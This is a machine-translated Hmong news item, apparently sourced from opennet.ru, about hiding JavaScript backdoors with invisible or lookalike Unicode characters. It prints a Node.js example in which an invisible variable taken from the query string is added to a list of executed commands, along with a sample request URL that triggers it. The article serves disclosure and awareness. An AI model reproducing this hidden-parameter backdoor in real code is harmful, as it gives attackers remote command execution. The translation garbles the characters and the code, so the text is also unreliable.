Ua raws li Trojan Source attack method, uas yog ua raws li kev siv cov cim Unicode uas hloov pauv cov lus txiav txim ntawm cov ntawv nyeem bidirectional, lwm cov txheej txheem los qhia txog qhov zais zais tau raug luam tawm, siv tau rau JavaScript code. Txoj kev tshiab yog ua raws li kev siv cov cim unicode "γ €" (code 0x3164, "HANGUL FILLER"), uas yog nyob rau hauv qeb ntawm cov ntawv, tab sis tsis pom cov ntsiab lus. Cov qeb Unicode uas tus cwj pwm no tau tso cai txij li ECMAScript 2015 cov lus qhia tshwj xeeb rau siv rau hauv JavaScript variable npe, ua rau nws muaj peev xwm los tsim cov tsis pom los yog hloov pauv tshiab uas tsis txawv ntawm lwm qhov sib txawv hauv cov code nrov xws li Notepad ++ thiab VS Code.
Raws li qhov piv txwv, cov cai rau Node.js platform tau muab, uas, siv qhov sib txawv uas muaj ib tus cim "γ €", lub nraub qaum yog muab zais uas tso cai rau ua tiav cov cai teev tseg los ntawm tus neeg tawm tsam: app.get('/ network_health', async (req, res) = > { const { timeout, γ €} = req.query; // qhov tseeb nws hais tias "const { timeout, γ € \u3164}" const checkCommands = [ 'ping -c 1 google. com', 'curl -s http:// example.com/', γ € // lub comma yog ua raws li tus cwj pwm \u3164];
Thaum xub thawj siab ib muag, tsuas yog tus nqi timeout yog dhau los ntawm sab nraud parameter, thiab cov array nrog cov lus txib kom ua tiav muaj cov npe tsis muaj teeb meem. Tab sis qhov tseeb, tom qab lub sij hawm hloov pauv, tus nqi ntawm lwm qhov tsis pom kev sib txawv nrog cov cim cim \u3164 raug muab, uas kuj tau hloov mus rau hauv cov lus txib ntawm kev ua tiav. Yog li, yog tias tus qauv tsim muaj, tus neeg tawm tsam tuaj yeem xa daim ntawv thov xws li "https://host:8080/network_health?%E3%85%A4=command" txhawm rau qhib lub nraub qaum thiab ua tiav lawv cov cai.
Lwm qhov piv txwv yog tus cwj pwm "Η" (ALVEOLAR CLICK), uas tuaj yeem siv los muab cov tsos ntawm qhov taw qhia exclamation. Piv txwv li, cov lus qhia "yog tias (environmentΗ=ENV_PROD){" thaum ua tiav hauv Node.js 14 yeej ib txwm muaj tseeb, vim nws tsis kuaj qhov txawv, tab sis muab tus nqi ntawm ENV_PROD rau qhov sib txawv "environmentΗ". Lwm cov cim unicode tsis raug suav nrog "οΌ", "β", "οΌ", "β©΅", "β¨", "β«½", "κΏ" thiab "β".
Tau qhov twg los: opennet.ru